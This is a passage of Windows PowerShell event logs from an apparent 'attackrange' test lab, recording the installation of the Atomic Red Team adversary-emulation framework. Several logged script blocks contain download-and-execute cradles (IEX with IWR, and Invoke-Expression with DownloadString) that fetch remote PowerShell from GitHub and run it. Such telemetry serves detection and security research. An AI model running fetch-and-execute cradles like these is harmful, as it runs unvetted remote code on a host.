                Invoke-Expression (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/$RepoOwner/invoke-atomicredteam/master/install-atomicsfolder.ps1"); Install-AtomicsFolder -InstallPath $InstallPath -DownloadPath $DownloadPath -Force:$Force -RepoOwner $RepoOwner
            }

            Write-Host "Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function" -Fore Yellow
            Write-Host "See Wiki at https://github.com/$repoOwner/invoke-atomicredteam/wiki for complete details" -Fore Yellow
        }
        else {
            Write-Host -ForegroundColor Yellow "Atomic Redteam already exists at $InstallPathwIart. No changes were made."
            Write-Host -ForegroundColor Cyan "Try the install again with the '-Force' parameter if you want to delete the existing installion and re-install."
            Write-Host -ForegroundColor Red "Warning: All files within the install directory ($InstallPathwIart) will be deleted when using the '-Force' parameter."
        }
    }
    Catch {
        Write-Host -ForegroundColor Red "Installation of AtomicRedTeam Failed."
        Write-Host $_.Exception.Message`n
    }
}


ScriptBlock ID: 1bb48c88-d884-4e7f-a01a-cbb7d8f59d3b
Path:
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466959
Keywords=None
Message=Started invocation of ScriptBlock ID: fa43fc60-cc8d-4d84-9337-5f3a3a3dbea0
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466958
Keywords=None
Message=Creating Scriptblock text (1 of 1):
    [Net.ServicePointManager]::SecurityProtocol = 
            [Net.SecurityProtocolType]::Tls12
    IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
    Install-AtomicRedTeam -getAtomics

ScriptBlock ID: fa43fc60-cc8d-4d84-9337-5f3a3a3dbea0
Path:
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466957
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467006
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467005
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467004
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467003
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467002
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467001
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467000
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466999
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466998
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466997
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466996
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466995
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466994
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466993
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466992
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466991
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466990
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466989
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466988
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466987
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466986
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466985
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466984
Keywords=None
Message=Completed invocation of ScriptBlock ID: a29f05d0-a5c2-4f6a-9a5c-bc019b59fb08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=1466983
Keywords=None
Message=CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem"


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b0030b64-c114-4765-a95a-dacf53f2747d
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Engine Version = 5.1.14393.4402
        Runspace ID = c5f1100c-56fc-4347-871f-80d397213539
        Pipeline ID = 6
        Command Name = Add-Type
        Command Type = Cmdlet
        Script Name = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psm1
        Command Path = 
        Sequence Number = 18
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=1466982
Keywords=None
Message=CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression"


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b0030b64-c114-4765-a95a-dacf53f2747d
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Engine Version = 5.1.14393.4402
        Runspace ID = c5f1100c-56fc-4347-871f-80d397213539
        Pipeline ID = 6
        Command Name = Add-Type
        Command Type = Cmdlet
        Script Name = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psm1
        Command Path = 
        Sequence Number = 16
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466981
Keywords=None
Message=Started invocation of ScriptBlock ID: a29f05d0-a5c2-4f6a-9a5c-bc019b59fb08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466980
Keywords=None
Message=Started invocation of ScriptBlock ID: 64663673-3388-407d-9a69-709aa0010c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466979
Keywords=None
Message=Completed invocation of ScriptBlock ID: e777e58d-4feb-4ac0-b78e-6bff84134961
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466978
Keywords=None
Message=Started invocation of ScriptBlock ID: e777e58d-4feb-4ac0-b78e-6bff84134961
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466977
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466976
Keywords=None
Message=Started invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466975
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466974
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466973
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466972
Keywords=None
Message=Started invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466971
Keywords=None
Message=Completed invocation of ScriptBlock ID: 140891b8-dab2-4f8d-8c88-a6d438201fe5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466970
Keywords=None
Message=Completed invocation of ScriptBlock ID: c6bcc595-2613-47db-aae7-b4f7c98549be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466969
Keywords=None
Message=Started invocation of ScriptBlock ID: c6bcc595-2613-47db-aae7-b4f7c98549be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466968
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# Localized	11/01/2018 05:01 AM (GMT)	303:4.80.0411 	ArchiveResources.psd1
# Localized ArchiveResources.psd1

ConvertFrom-StringData @'
###PSLOC
PathNotFoundError=The path '{0}' either does not exist or is not a valid file system path.
ExpandArchiveInValidDestinationPath=The path '{0}' is not a valid file system directory path.
InvalidZipFileExtensionError={0} is not a supported archive file format. {1} is the only supported archive file format.
ArchiveFileIsReadOnly=The attributes of the archive file {0} is set to 'ReadOnly' hence it cannot be updated. If you intend to update the existing archive file, remove the 'ReadOnly' attribute on the archive file else use -Force parameter to override and create a new archive file.
ZipFileExistError=The archive file {0} already exists. Use the -Update parameter to update the existing archive file or use the -Force parameter to overwrite the existing archive file.
DuplicatePathFoundError=The input to {0} parameter contains a duplicate path '{1}'. Provide a unique set of paths as input to {2} parameter.
ArchiveFileIsEmpty=The archive file {0} is empty.
CompressProgressBarText=The archive file '{0}' creation is in progress...
ExpandProgressBarText=The archive file '{0}' expansion is in progress...
AppendArchiveFileExtensionMessage=The archive file path '{0}' supplied to the DestinationPath patameter does not include .zip extension. Hence .zip is appended to the supplied DestinationPath path and the archive file would be created at '{1}'.
AddItemtoArchiveFile=Adding '{0}'.
BadArchiveEntry=Can not process invalid archive entry '{0}'.
CreateFileAtExpandedPath=Created '{0}'.
InvalidArchiveFilePathError=The archive file path '{0}' specified as input to the {1} parameter is resolving to multiple file system paths. Provide a unique path to the {2} parameter where the archive file has to be created.
InvalidExpandedDirPathError=The directory path '{0}' specified as input to the DestinationPath parameter is resolving to multiple file system paths. Provide a unique path to the Destination parameter where the archive file contents have to be expanded.
FileExistsError=Failed to create file '{0}' while expanding the archive file '{1}' contents as the file '{2}' already exists. Use the -Force parameter if you want to overwrite the existing directory '{3}' contents when expanding the archive file.
DeleteArchiveFile=The partially created archive file '{0}' is deleted as it is not usable.
InvalidDestinationPath=The destination path '{0}' does not contain a valid archive file name.
PreparingToCompressVerboseMessage=Preparing to compress...
PreparingToExpandVerboseMessage=Preparing to expand...
###PSLOC
'@


ScriptBlock ID: c6bcc595-2613-47db-aae7-b4f7c98549be
Path:
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466967
Keywords=None
Message=Started invocation of ScriptBlock ID: 140891b8-dab2-4f8d-8c88-a6d438201fe5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466966
Keywords=None
Message=Completed invocation of ScriptBlock ID: c3542e09-9351-46bb-aa37-16bbc97c0ac1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466965
Keywords=None
Message=Started invocation of ScriptBlock ID: c3542e09-9351-46bb-aa37-16bbc97c0ac1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467064
Keywords=None
Message=Started invocation of ScriptBlock ID: 45379c41-a4a5-4f66-b608-7333082ce12f
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467063
Keywords=None
Message=Completed invocation of ScriptBlock ID: 833ce886-0bda-40cb-a1a0-6b86440eef1c
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
